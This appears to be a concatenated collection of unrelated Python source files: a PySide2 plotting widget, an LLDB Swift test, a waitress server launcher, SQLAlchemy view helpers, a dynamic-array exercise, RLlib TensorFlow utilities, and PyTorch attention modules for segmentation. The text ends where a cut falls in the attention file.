py | b415b6c32edbb3286f6bfde7ad9a2e0821a41ab7 | from PySide2.QtWidgets import QSpacerItem, QWidget
from PySide2.QtCore import Signal
from SciDataTool.GUI.WAxisManager.Ui_WAxisManager import Ui_WAxisManager
from SciDataTool.GUI.WSliceOperator.WSliceOperator import WSliceOperator
from SciDataTool.Functions import axes_dict, rev_axes_dict
EXTENSION_DICT = {
"slice": ["rss", "sum", "rms", "mean", "integrate", "list", "single"],
"axis": [
"derivate",
"oneperiod",
"antiperiod",
"smallestperiod",
"pattern",
"axis_data",
"interval",
"whole",
],
}
class WAxisManager(Ui_WAxisManager, QWidget):
"""Widget that will handle the selection of the axis as well as generating WDataExtractor"""
refreshNeeded = Signal()
refreshRange = Signal()
def __init__(self, parent=None):
"""Initializing the widget by hiding/showing widget and connecting buttons
Parameters
----------
self : WAxisManager
a WAxisManager object
parent : QWidget
The parent widget
"""
# Build the interface according to the .ui file
QWidget.__init__(self, parent=parent)
self.setupUi(self)
self.axes_list = list()
# Managing the signal emitted by the WAxisSelector widgets
self.w_axis_1.axisChanged.connect(self.axis_1_updated)
self.w_axis_2.axisChanged.connect(self.axis_2_updated)
# The action in axis 2 is by default the one chosen in axis 1
self.w_axis_1.actionChanged.connect(lambda: self.fft_sync("axis 1"))
self.w_axis_2.actionChanged.connect(lambda: self.fft_sync("axis 2"))
self.w_axis_1.refreshNeeded.connect(self.update_needed)
self.w_axis_2.refreshNeeded.connect(self.update_needed)
def axis_1_updated(self):
"""Method that remove the axis selected in w_axis_1 from w_axis_2 and call the method that generates
the layout with the WDataExtractor.
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
# Making sure that when axis 1 is updated, axis 1 and 2 are both on "None" for the action combobox
self.fft_sync("axis 1")
        # Recovering the axis selected by the user and removing it from the second axis combobox
self.w_axis_2.remove_axis(self.w_axis_1.get_axis_selected())
def axis_2_updated(self):
"""Method that make sure that when axis 2 is selected (None->?) it has the same fft/ifft combobox selected as axis1
then generates Data Selection
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
# Making sure that when axis 1 is updated, axis 1 and 2 are both on "None" for the action combobox
self.fft_sync("axis 1")
def gen_slice_op(self):
"""Method that gen the right WDataExtrator widget according to the axis selected by the user in the UI
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
# Step 1 : Recovering the axis that must be generated (those that are not selected)
# Getting all the possible axes
axes_list_1 = self.w_axis_1.get_axes_name()[:]
axes_list_2 = self.w_axis_2.get_axes_name()[:]
# Getting the axes selected and removing them from the right axes_list
axis_selected_1 = self.w_axis_1.get_axis_selected()
axis_selected_2 = self.w_axis_2.get_axis_selected()
axes_list_1.remove(axis_selected_1)
if axis_selected_2 in axes_list_2:
axes_list_2.remove(axis_selected_2)
# Selecting the axes that are in common between the two axes lists
axes_gen = list()
axes_gen = [ax for ax in axes_list_1 if ax in axes_list_2]
for ax in self.axes_list:
if ax.is_overlay:
axes_gen.append(ax.name)
# Step 2 : Removing the items that are in the layout currently
for i in reversed(range(self.lay_data_extract.count())):
self.lay_data_extract.takeAt(i).widget().setParent(None)
# Step 3 : For each axis available, adding a WSliceOperator widget inside the layout
# If there are no slice to do (two axis available and selected before) then we hide the groupBox
if len(axes_gen) != 0:
self.g_data_extract.show()
self.w_slice_op = list()
for axis in axes_gen:
temp = WSliceOperator(self.g_data_extract)
temp.setObjectName(axis)
for ax in self.axes_list:
if (
ax.name == axis
or axis in axes_dict
and ax.name in axes_dict[axis]
or axis in rev_axes_dict
and ax.name in rev_axes_dict[axis]
):
temp.update(ax)
temp.refreshNeeded.connect(self.update_needed)
self.w_slice_op.append(temp)
self.lay_data_extract.addWidget(temp)
else:
self.w_slice_op = list()
self.g_data_extract.hide()
self.update_needed()
def get_axes_selected(self):
"""Method that return the axes chosen by the user and their unit as a string
so that we can use them to plot the data.
Parameters
----------
self : WAxisManager
a WAxisManager object
Output
---------
string
name of the axis and their units
"""
axes_selected = list()
# Recovering the first axis
axes_selected.append(self.w_axis_1.get_axis_unit_selected())
# If a second axis is selected, then we add it as well
if self.w_axis_2.get_axis_unit_selected() != "None":
axes_selected.append(self.w_axis_2.get_axis_unit_selected())
return axes_selected
def get_operation_selected(self):
"""Method that return the operations chosen by the user and the related axis as a string
so that we can use them to plot the data.
Parameters
----------
self : WAxisManager
a WAxisManager object
Output
---------
string
name of the operation and its axis
"""
return [wid.get_operation_selected() for wid in self.w_slice_op]
def fft_sync(self, axis_changed):
"""Method that will check the action chosen and that update the other action combobox to have the same action.
So that, by default, we have FFT and FFT or "None" and "None"
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
if axis_changed == "axis 1" and "FFT" in [
self.w_axis_1.c_action.itemText(i)
for i in range(self.w_axis_1.c_action.count())
]:
action_selected = self.w_axis_1.get_current_action_name()
self.w_axis_2.set_action(action_selected)
self.gen_slice_op()
elif axis_changed == "axis 2" and "FFT" in [
self.w_axis_2.c_action.itemText(i)
for i in range(self.w_axis_2.c_action.count())
]:
action_selected = self.w_axis_2.get_current_action_name()
self.w_axis_1.set_action(action_selected)
self.gen_slice_op()
def set_axis_widgets(
self, data, axes_request_list, frozen_type=0, is_keep_config=False
):
"""Method used to set the axes of the Axes group box as well as setting the widgets of the DataSelection groupbox
Parameters
----------
self : WAxisManager
a WAxisManager object
data : DataND
The DataND object that we want to plot
axes_request_list:
list of RequestedAxis which are the info given for the autoplot (for the axes and DataSelection)
frozen_type : int
0 to let the user modify the axis of the plot, 1 to let him switch them, 2 to not let him change them, 3 to freeze both axes and operations
"""
if is_keep_config: # Only update slider
for wid in self.w_slice_op:
if hasattr(wid, "axis_value"):
wid.update_floatEdit(is_refresh=False)
else:
# Step 1 : If only one axis is given with the object, then we hide w_axis_2 and g_data_extract
            # We also have to hide them if there is more than one axis but only one is not an overlay (is_overlay = False)
if len(data.get_axes()) == 1 or (
len(data.get_axes())
- len([ax for ax in data.get_axes() if ax.is_overlay == True])
== 1
):
self.w_axis_2.hide()
self.g_data_extract.hide()
else:
self.w_axis_2.show()
self.g_data_extract.show()
            # Step 2 : If we have user input, then we set the UI according to user_input.
            # Otherwise we use the default info
self.w_axis_1.blockSignals(True)
self.w_axis_2.blockSignals(True)
if axes_request_list == []:
# Case where no user_input was given
# Sending the info of data to the widget (mainly the axis)
self.axes_list = data.get_axes()
self.w_axis_1.update(self.axes_list)
self.w_axis_2.update(self.axes_list, axis_name="Y")
# Updating w_axis_2 according to w_axis_1 then generating DataSelection
self.axis_1_updated()
else:
                # Case where user input was given (auto-plot)
                # If user inputs are given (auto-plot), we have to process them
axes_list = [
ax
for ax in axes_request_list
if ax.extension in EXTENSION_DICT["axis"]
]
slices_op_list = [
ax
for ax in axes_request_list
if ax.extension in EXTENSION_DICT["slice"]
]
# Sending the info of data to the widget (mainly the axis)
self.axes_list = data.get_axes()
self.w_axis_1.update(self.axes_list)
self.w_axis_2.update(self.axes_list, axis_name="Y")
# Setting the axis selected in w_axis_1 according to user_input_list
self.w_axis_1.set_axis(axes_list[0])
# Updating w_axis_2 according to w_axis_1 then generating DataSelection
self.axis_1_updated()
# Setting the axis selected in w_axis_1 according to user_input_list if we have a second axis
if len(axes_list) == 2:
self.w_axis_2.set_axis(axes_list[1])
# Making sure that we have the same fft/ifft selected for both axis
self.axis_2_updated()
# Generating DataSelection with the input of user if they are given or by default (like in a manual plot)
if len(slices_op_list) != 0:
self.set_slice_op(slices_op_list)
else:
self.gen_slice_op()
# Depending on the value of frozen type we are going to act on the UI
if frozen_type == 1 and len(axes_list) == 2:
# Recovering the axis requested by the user as they will be soft frozen (possible to switch but not possible to choose another axis)
axes_list_name = [ax.name for ax in axes_list]
axes_soft_frozen = [
ax for ax in self.axes_list if ax.name in axes_list_name
]
# We update the WAxisSelector widget with the axes that will be soft frozen
self.w_axis_1.update(axes_soft_frozen)
self.w_axis_2.update(axes_soft_frozen)
self.axis_1_updated()
elif frozen_type == 2:
# If we want to hard freeze the axis, we just have to disable the axis comboboxes
self.w_axis_1.c_axis.setDisabled(True)
self.w_axis_2.c_axis.setDisabled(True)
elif frozen_type == 3:
# Freezing the axes
self.w_axis_1.c_axis.setDisabled(True)
self.w_axis_1.c_action.setDisabled(True)
self.w_axis_2.c_axis.setDisabled(True)
self.w_axis_2.c_action.setDisabled(True)
# Freezing the operations
for w_slice in self.w_slice_op:
w_slice.b_action.setDisabled(True)
w_slice.c_operation.setDisabled(True)
w_slice.lf_value.setDisabled(True)
w_slice.slider.setDisabled(True)
if len(axes_list) == 1:
self.w_axis_2.hide()
self.w_axis_1.blockSignals(False)
self.w_axis_2.blockSignals(False)
def set_slice_op(self, user_input_list):
"""Method that set the right operation inside each WSliceOperator inside of w_slice_op
according to user input (auto plot).
Parameters
----------
self : WAxisManager
a WAxisManager object
user_input_list : list
list of the inputs from the user to set the DataSelection (auto-plot)
"""
for wid in self.w_slice_op:
wid.set_operation(user_input_list[self.w_slice_op.index(wid)])
def update_needed(self):
"""Method that emits a signal (refreshNeeded) that will be used to automaticaly update the plot inside the GUI.
This signal is triggered by other signals comming from WSliceOperator or WAxisSelector.
refreshRange is a different signal that we use to update the values of min and max inside w_range
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
self.refreshNeeded.emit()
self.refreshRange.emit()
|
py | b415b832993833e0dfbe65ac7d0f153504a09437 | # TestSwiftVersion.py
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ------------------------------------------------------------------------------
"""
Test that LLDB can debug code generated by the Swift compiler for different versions of the language
"""
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
import lldbsuite.test.lldbutil as lldbutil
import os
import os.path
import time
import unittest2
class TestSwiftVersion(TestBase):
mydir = TestBase.compute_mydir(__file__)
@skipUnlessDarwin
@swiftTest
def test_cross_module_extension(self):
"""Test that LLDB can debug different Swift language versions"""
self.build()
self.do_test()
def setUp(self):
TestBase.setUp(self)
def do_test(self):
"""Test that LLDB can debug different Swift language versions"""
def cleanup():
lldbutil.execute_command("make cleanup")
self.addTearDownHook(cleanup)
exe_name = "main"
exe_path = self.getBuildArtifact(exe_name)
tests = [
{ 'file' : "mod5.swift",
'source_regex' : "break 5",
'expr' : "S5().i",
'substr' : "5" },
{ 'file' : "mod4.swift",
'source_regex' : "break 4",
'expr' : "S4().i",
'substr' : "4" }
]
# Create the target
target = self.dbg.CreateTarget(exe_path)
self.assertTrue(target, VALID_TARGET)
self.registerSharedLibrariesWithTarget(target, ['mod4', 'mod5'])
for t in tests:
source_name = t['file']
source_spec = lldb.SBFileSpec(source_name)
breakpoint = target.BreakpointCreateBySourceRegex(t['source_regex'], source_spec)
self.assertTrue(breakpoint.GetNumLocations() > 0, "Breakpoint set successfully with file " + source_name + ", regex " + t['source_regex'])
process = target.LaunchSimple(None, None, os.getcwd())
self.assertTrue(process, PROCESS_IS_VALID)
for t in tests:
thread = process.GetSelectedThread()
frame = thread.GetFrameAtIndex(0)
val = frame.EvaluateExpression(t['expr'])
self.assertTrue(t['substr'] in str(val.GetValue()), "Expression " + t['expr'] + " result " + val.GetValue() + " has substring " + t['substr'])
process.Continue()
|
py | b415b84d2dd414e46f5a23acb1f489e6114fc560 | from waitress import serve
import logging
import sys
import signal
from vmtestserver.server import app
logger = logging.getLogger(__name__)
def set_up_logging():
# setup logging on stdout
logger = logging.getLogger('')
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler(stream=sys.stdout))
logger = logging.getLogger('azure')
logger.setLevel(logging.WARNING)
logger = logging.getLogger('pika')
logger.setLevel(logging.WARNING)
def signal_term_handler(signum, _):
logger.info('Received signal %d', signum)
raise KeyboardInterrupt() # this will stop waitress from serving
if __name__ == '__main__':
set_up_logging()
try:
logger.info('Starting...')
logger.debug('Setting up SIGTERM handler')
signal.signal(signal.SIGTERM, signal_term_handler)
serve(app, port=80)
logger.info('Finished.')
except KeyboardInterrupt:
logger.info('Interrupted.')
|
py | b415b852eb1504fe65a58d7db038c31b5386abda | """
This file is part of the TheLMA (THe Laboratory Management Application) project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Utilities to create/drop views.
Based on a recipe published in:
http://www.sqlalchemy.org/trac/wiki/UsageRecipes/Views
"""
from sqlalchemy.sql import table
from sqlalchemy.ext import compiler
from sqlalchemy.schema import DDLElement
__docformat__ = 'reStructuredText en'
__all__ = ['CreateView',
'DropView',
'view_factory',
]
class CreateView(DDLElement):
def __init__(self, name, selectable): # pylint: disable=W0231
self.name = name
self.selectable = selectable
class DropView(DDLElement):
def __init__(self, name): # pylint: disable=W0231
self.name = name
@compiler.compiles(CreateView, 'postgresql')
def create_view_compile_postgresql(element, compiler, **kw): # pylint: disable=W0621,W0613
selection = compiler.sql_compiler.process(element.selectable)
stmt = "CREATE OR REPLACE VIEW %s AS %s" % (element.name, selection)
# FIXME: we should not combine the statement and params here.
# it is a SQLAlchemy bug... report it.
params = {}
for k, v in element.selectable.compile().params.iteritems():
params[k] = ("'%s'" % v) if isinstance(v, basestring) else v
return stmt % params
@compiler.compiles(CreateView, 'sqlite')
def create_view_compile_sqlite(element, compiler, **kw): # pylint: disable=W0621,W0613
# FIXME: duplicate code
# FIXME: it seems that there is a bug in SQLAlchemy and creating views
# this way emits an exception
selection = compiler.sql_compiler.process(element.selectable)
stmt = "CREATE VIEW %s AS %s" % (element.name, selection)
# FIXME: we should not combine the statement and params here.
# it is a SQLAlchemy bug... report it.
params = {}
for k, v in element.selectable.compile().params.iteritems():
params[k] = ("'%s'" % v) if isinstance(v, basestring) else v
return stmt % params
@compiler.compiles(DropView)
def drop_view_compile(element, compiler, **kw): # pylint: disable=W0621,W0613
return "DROP VIEW %s" % (element.name)
def view_factory(name, metadata, selectable):
if not hasattr(metadata, 'views'):
metadata.views = {}
metadata.views[name] = table(name)
for c in selectable.c:
c._make_proxy(metadata.views[name]) # pylint: disable=W0212
CreateView(name, selectable).execute_at('after-create', metadata)
DropView(name).execute_at('before-drop', metadata)
return metadata.views[name]
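# Illustrative usage sketch (added comment, not part of the original module).
# The table, columns and engine below are made-up names; they only show how
# view_factory() is intended to be wired into a MetaData object so that the
# CREATE/DROP VIEW DDL above fires on metadata.create_all() / drop_all():
#
#     from sqlalchemy import MetaData, Table, Column, Integer, String, select
#
#     metadata = MetaData()
#     stock = Table('stock', metadata,
#                   Column('id', Integer, primary_key=True),
#                   Column('symbol', String(10)),
#                   Column('price', Integer))
#     cheap_stock = view_factory(
#         'cheap_stock', metadata,
#         select([stock.c.id, stock.c.symbol]).where(stock.c.price < 100))
#     # metadata.create_all(engine) now also emits the CREATE OR REPLACE VIEW
#     # statement, and metadata.drop_all(engine) drops the view again.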
|
py | b415b858d8a599eba97f187eaf86268f669c5202 | import unittest
import ctypes
class DynamicArray:
def __init__(self):
self._n = 0
self._capacity = 1
self._A = self._make_array(self._capacity)
@staticmethod
def _make_array(c):
return (c * ctypes.py_object)()
def __len__(self):
return self._n
def __getitem__(self, k):
if not -self._n <= k < self._n:
raise IndexError("invalid index")
return self._A[k] if k >= 0 else self._A[self._n + k]
def append(self, obj):
if self._n == self._capacity:
self._resize(2 * self._capacity)
self._A[self._n] = obj
self._n += 1
def _resize(self, c):
B = self._make_array(c)
for k in range(self._n):
B[k] = self._A[k]
self._A = B
self._capacity = c
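    # Added note (not in the original file): doubling the capacity whenever
    # the array is full keeps append() amortized O(1).  Appending 10 items to
    # a fresh array grows the capacity 1 -> 2 -> 4 -> 8 -> 16 and copies
    # 1 + 2 + 4 + 8 = 15 elements in total, which is bounded by 2 * n.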
class MyTestCase(unittest.TestCase):
def test_something(self):
da = DynamicArray()
for i in range(10):
da.append(i)
self.assertEqual(8, da[-2])
if __name__ == '__main__':
unittest.main()
|
py | b415b8689a72d0dfd32ae5b145e413087111bac6 | from ray.rllib.utils.framework import try_import_tf
tf = try_import_tf()
def explained_variance(y, pred):
_, y_var = tf.nn.moments(y, axes=[0])
_, diff_var = tf.nn.moments(y - pred, axes=[0])
return tf.maximum(-1.0, 1 - (diff_var / y_var))
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5, delta * (tf.abs(x) - 0.5 * delta))
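# Added illustration (not part of the original module): the piecewise form
# that huber_loss() expresses with tf.where, written out for a plain float.
# Inside the |x| < delta band the loss is quadratic; outside it continues
# linearly, so large errors are penalised less aggressively than with MSE.
def _huber_loss_reference(x, delta=1.0):
    """Scalar reference for the Huber loss above (pure Python, no tf)."""
    if abs(x) < delta:
        return 0.5 * x * x
    return delta * (abs(x) - 0.5 * delta)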
def reduce_mean_ignore_inf(x, axis):
"""Same as tf.reduce_mean() but ignores -inf values."""
mask = tf.not_equal(x, tf.float32.min)
x_zeroed = tf.where(mask, x, tf.zeros_like(x))
return (tf.reduce_sum(x_zeroed, axis) / tf.reduce_sum(
tf.cast(mask, tf.float32), axis))
def minimize_and_clip(optimizer, objective, var_list, clip_val=10.0):
"""Minimized `objective` using `optimizer` w.r.t. variables in
`var_list` while ensure the norm of the gradients for each
variable is clipped to `clip_val`
"""
# Accidentally passing values < 0.0 will break all gradients.
assert clip_val > 0.0, clip_val
gradients = optimizer.compute_gradients(objective, var_list=var_list)
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, clip_val), var)
return gradients
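# Usage sketch (added comment; `loss` and the optimizer below are assumed
# placeholders, not part of this module).  minimize_and_clip() only returns
# the clipped (gradient, variable) pairs; they still have to be applied:
#
#     optimizer = tf.train.AdamOptimizer(1e-3)
#     grads_and_vars = minimize_and_clip(optimizer, loss,
#                                        var_list=tf.trainable_variables(),
#                                        clip_val=10.0)
#     train_op = optimizer.apply_gradients(grads_and_vars)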
def make_tf_callable(session_or_none, dynamic_shape=False):
"""Returns a function that can be executed in either graph or eager mode.
The function must take only positional args.
If eager is enabled, this will act as just a function. Otherwise, it
will build a function that executes a session run with placeholders
internally.
Arguments:
session_or_none (tf.Session): tf.Session if in graph mode, else None.
dynamic_shape (bool): True if the placeholders should have a dynamic
batch dimension. Otherwise they will be fixed shape.
Returns:
a Python function that can be called in either mode.
"""
if tf.executing_eagerly():
assert session_or_none is None
else:
assert session_or_none is not None
def make_wrapper(fn):
if session_or_none:
placeholders = []
symbolic_out = [None]
def call(*args):
args_flat = []
for a in args:
if type(a) is list:
args_flat.extend(a)
else:
args_flat.append(a)
args = args_flat
if symbolic_out[0] is None:
with session_or_none.graph.as_default():
for i, v in enumerate(args):
if dynamic_shape:
if len(v.shape) > 0:
shape = (None, ) + v.shape[1:]
else:
shape = ()
else:
shape = v.shape
placeholders.append(
tf.placeholder(
dtype=v.dtype,
shape=shape,
name="arg_{}".format(i)))
symbolic_out[0] = fn(*placeholders)
feed_dict = dict(zip(placeholders, args))
ret = session_or_none.run(symbolic_out[0], feed_dict)
return ret
return call
else:
return fn
return make_wrapper
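# Usage sketch (added comment): the wrapped function can be called the same
# way in graph and eager mode.  The `session` below is an assumed tf.Session
# created by the caller, not something defined in this module.
#
#     @make_tf_callable(session)      # graph mode: args fed via placeholders
#     def add(a, b):
#         return a + b
#
#     out = add(np.array([1.0]), np.array([2.0]))   # triggers a session.run()
#
#     @make_tf_callable(None)         # eager mode: behaves like a plain call
#     def add_eager(a, b):
#         return a + b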
def scope_vars(scope, trainable_only=False):
"""
Get variables inside a scope
The scope can be specified as a string
Parameters
----------
scope: str or VariableScope
scope in which the variables reside.
trainable_only: bool
whether or not to return only the variables that were marked as
trainable.
Returns
-------
vars: [tf.Variable]
list of variables in `scope`.
"""
return tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES
if trainable_only else tf.GraphKeys.VARIABLES,
scope=scope if isinstance(scope, str) else scope.name)
|
py | b415b93de8efcd32e1cec1de6b7e7db47b88a8bc |
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
from mmcv.utils import Registry, build_from_cfg
from .custom_blocks import Mix2Pooling, int_size
from mmseg.models.builder import ATTENTION
# ---------------------------------------------------------------------------- #
# SELayer
# ---------------------------------------------------------------------------- #
@ATTENTION.register_module()
class SE(nn.Module):
def __init__(self, in_channels, reduction=4):
super(SE, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
inter_channels = in_channels // reduction
self.fc = nn.Sequential(
nn.Linear(in_channels, inter_channels, bias=False),
nn.ReLU(inplace=True),
# Mish(),
nn.Linear(inter_channels, in_channels, bias=False),
nn.Sigmoid()
)
def forward(self, x):
n, c, h, w = int_size(x)
y = self.avg_pool(x).view(n, c)
y_expand = self.fc(y).view(n, c, 1, 1)
return x * y_expand
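# Usage sketch (added comment): SE performs channel-wise re-weighting and
# preserves the input shape.  The sizes below are illustrative only.
#
#     se = SE(in_channels=64, reduction=4)
#     y = se(torch.randn(2, 64, 32, 32))    # y.shape == (2, 64, 32, 32)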
# ---------------------------------------------------------------------------- #
# NonLocal Block
# ---------------------------------------------------------------------------- #
@ATTENTION.register_module()
class NonLocal(nn.Module):
def __init__(self, in_channels):
super(NonLocal, self).__init__()
self.inter_channel = in_channels // 2
self.conv_phi = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1,padding=0, bias=False)
self.conv_theta = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.conv_g = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.softmax = nn.Softmax(dim=1)
self.conv_mask = nn.Conv2d(in_channels=self.inter_channel, out_channels=in_channels,
kernel_size=1, stride=1, padding=0, bias=False)
def forward(self, x):
# [N, C, H , W]
b, c, h, w = int_size(x)
# [N, C/2, H * W]
x_phi = self.conv_phi(x).view(b, c, -1)
# [N, H * W, C/2]
x_theta = self.conv_theta(x).view(b, c, -1).permute(0, 2, 1).contiguous()
x_g = self.conv_g(x).view(b, c, -1).permute(0, 2, 1).contiguous()
# [N, H * W, H * W]
mul_theta_phi = torch.matmul(x_theta, x_phi)
mul_theta_phi = self.softmax(mul_theta_phi)
# [N, H * W, C/2]
mul_theta_phi_g = torch.matmul(mul_theta_phi, x_g)
# [N, C/2, H, W]
mul_theta_phi_g = mul_theta_phi_g.permute(0,2,1).contiguous().view(b,self.inter_channel, h, w)
# [N, C, H , W]
mask = self.conv_mask(mul_theta_phi_g)
out = mask + x
return out
# ---------------------------------------------------------------------------- #
# SCSE Block
# ---------------------------------------------------------------------------- #
class SpatialSE(nn.Module):
def __init__(self, channel):
super(SpatialSE, self).__init__()
self.spatial_excitation = nn.Sequential(
nn.Conv2d(in_channels=channel, out_channels=1, kernel_size=1, stride=1, padding=0),
nn.Sigmoid()
)
def forward(self,x):
        spatial_weight = self.spatial_excitation(x)
        return x * spatial_weight
class ChannelSE(nn.Module):
def __init__(self, channel, reduction=4):
super(ChannelSE, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
reduction_channel = int(channel / reduction)
self.fc = nn.Sequential(
nn.Linear(channel, reduction_channel, bias=False),
nn.ReLU(inplace=True),
nn.Linear(reduction_channel, channel, bias=False),
nn.Sigmoid()
)
def forward(self, x):
n, c = int(x.size(0)), int(x.size(1))
y = self.avg_pool(x).view(n, c)
y_expand = self.fc(y).view(n, c, 1, 1)
return x * y_expand
@ATTENTION.register_module()
class SCSE(nn.Module):
def __init__(self, in_channels, reduction=4):
super(SCSE, self).__init__()
self.spatialSE = SpatialSE(in_channels)
self.channelSE = ChannelSE(in_channels, reduction=reduction)
def forward(self,x):
return self.spatialSE(x) + self.channelSE(x)
@ATTENTION.register_module()
class SCSE2(nn.Module):
def __init__(self, in_channels, reduction=4):
super(SCSE2, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
reduction_channel = int(in_channels / reduction)
self.channel_excitation = nn.Sequential(
nn.Linear(in_channels, reduction_channel, bias=False),
nn.ReLU(inplace=True),
nn.Linear(reduction_channel, in_channels, bias=False),
nn.Sigmoid()
)
self.spatial_excitation = nn.Sequential(
nn.Conv2d(in_channels=in_channels, out_channels=1, kernel_size=1, stride=1, padding=0),
nn.Sigmoid()
)
def forward(self,x):
n, c = int(x.size(0)), int(x.size(1))
y = self.avg_pool(x).view(n, c)
        channel_weight = self.channel_excitation(y).view(n, c, 1, 1)
        spatial_weight = self.spatial_excitation(x)
        x = x * channel_weight * spatial_weight
return x
# ---------------------------------------------------------------------------- #
# CBAM :: Convolutional Block Attention Module
# ---------------------------------------------------------------------------- #
## ---- Channel Attention ---- ##
class ChannelAttention(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttention, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.max_pool = nn.AdaptiveMaxPool2d(1)
self.sharedMLP = nn.Sequential(
nn.Conv2d(in_planes, int(in_planes / ratio), 1, bias=False), nn.ReLU(),
nn.Conv2d(int(in_planes / ratio), in_planes, 1, bias=False))
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avgout = self.sharedMLP(self.avg_pool(x))
maxout = self.sharedMLP(self.max_pool(x))
return x * self.sigmoid(avgout + maxout)
class ChannelAttentionMixPooling(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttentionMixPooling, self).__init__()
self.mix_pool = Mix2Pooling(1)
self.sharedMLP = nn.Sequential(
nn.Conv2d(in_planes, int(in_planes / ratio), 1, bias=False), nn.ReLU(),
nn.Conv2d(int(in_planes / ratio), in_planes, 1, bias=False))
self.sigmoid = nn.Sigmoid()
def forward(self, x):
mixout = self.sharedMLP(self.mix_pool(x))
return x * self.sigmoid(mixout)
## ---- Spatial Attention ---- ##
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
assert kernel_size in (3, 7), "kernel size must be 3 or 7"
padding = 3 if kernel_size == 7 else 1
self.conv = nn.Conv2d(2, 1, kernel_size, padding=padding, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avgout = torch.mean(x, dim=1, keepdim=True)
maxout, _ = torch.max(x, dim=1, keepdim=True)
out = torch.cat([avgout, maxout], dim=1)
out = self.conv(out)
return x * self.sigmoid(out)
@ATTENTION.register_module()
class CBAM(nn.Module):
def __init__(self, in_channels, ratio=16, kernel_size=7):
super(CBAM, self).__init__()
self.ChannelAttention = ChannelAttention(in_channels, ratio)
self.SpatialAttention = SpatialAttention(kernel_size)
def forward(self, x):
x = self.ChannelAttention(x)
x = self.SpatialAttention(x)
return x
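# Usage sketch (added comment): CBAM applies channel attention first and
# spatial attention second, keeping the input shape.  Sizes are illustrative.
#
#     cbam = CBAM(in_channels=128, ratio=16, kernel_size=7)
#     y = cbam(torch.randn(2, 128, 64, 64))   # y.shape == (2, 128, 64, 64)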
@ATTENTION.register_module()
class MCBAM(nn.Module):
def __init__(self, in_channels, ratio=16, kernel_size=7):
super(MCBAM, self).__init__()
self.ChannelAttention = ChannelAttentionMixPooling(in_channels, ratio)
self.SpatialAttention = SpatialAttention(kernel_size)
def forward(self, x):
x = self.ChannelAttention(x)
x = self.SpatialAttention(x)
return x
# ---------------------------------------------------------------------------- #
# EMANet :: https://github.com/XiaLiPKU/EMANet
# ---------------------------------------------------------------------------- #
class EMAU_ORG(nn.Module):
'''The Expectation-Maximization Attention Unit (EMAU).
Arguments:
c (int): The input and output channel number.
k (int): The number of the bases.
stage_num (int): The iteration number for EM.
'''
def __init__(self, channel, k, stage_num=3, norm_layer=nn.BatchNorm2d):
super(EMAU_ORG, self).__init__()
self.stage_num = stage_num
mu = torch.Tensor(1, channel, k)
mu.normal_(0, math.sqrt(2. / k)) # Init with Kaiming Norm.
mu = self._l2norm(mu, dim=1)
self.register_buffer('mu', mu)
self.momentum = 0.9
self.conv1 = nn.Conv2d(channel, channel, 1)
self.conv2 = nn.Sequential(
nn.Conv2d(channel, channel, 1, bias=False),
norm_layer(channel))
self.relu = nn.ReLU(True)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.zero_()
def _l2norm(self, inp, dim):
'''Normalize the inp tensor with l2-norm.
Returns a tensor where each sub-tensor of input along the given dim is
normalized such that the 2-norm of the sub-tensor is equal to 1.
Arguments:
inp (tensor): The input tensor.
dim (int): The dimension to slice over to get the sub-tensors.
Returns:
(tensor) The normalized tensor.
'''
return inp / (1e-6 + inp.norm(dim=dim, keepdim=True))
def forward(self, x):
idn = x
# The first 1x1 conv
x = self.conv1(x)
# The EM Attention
b, c, h, w = int_size(x)
x = x.view(b, c, h * w) # b * c * n
mu = self.mu.repeat(b, 1, 1) # 1 * c * k ==> b * c * k
with torch.no_grad():
for i in range(self.stage_num):
x_t = x.permute(0, 2, 1).contiguous() # b * n * c
z = torch.bmm(x_t, mu) # b * n * k
z = F.softmax(z, dim=2) # b * n * k
z_ = z / (1e-6 + z.sum(dim=1, keepdim=True))
mu = torch.bmm(x, z_) # b * c * k
mu = self._l2norm(mu, dim=1)
# !!! The moving averaging operation
if self.training:
mmu = mu.mean(dim=0, keepdim=True)
self.mu *= self.momentum
self.mu += mmu * (1 - self.momentum)
z_t = z.permute(0, 2, 1) # b * k * n
x = mu.matmul(z_t) # b * c * n
x = x.view(b, c, h, w) # b * c * h * w
x = self.relu(x)
# The second 1x1 conv
x = self.conv2(x)
x = x + idn
x = self.relu(x)
return x
class EMAU1(nn.Module):
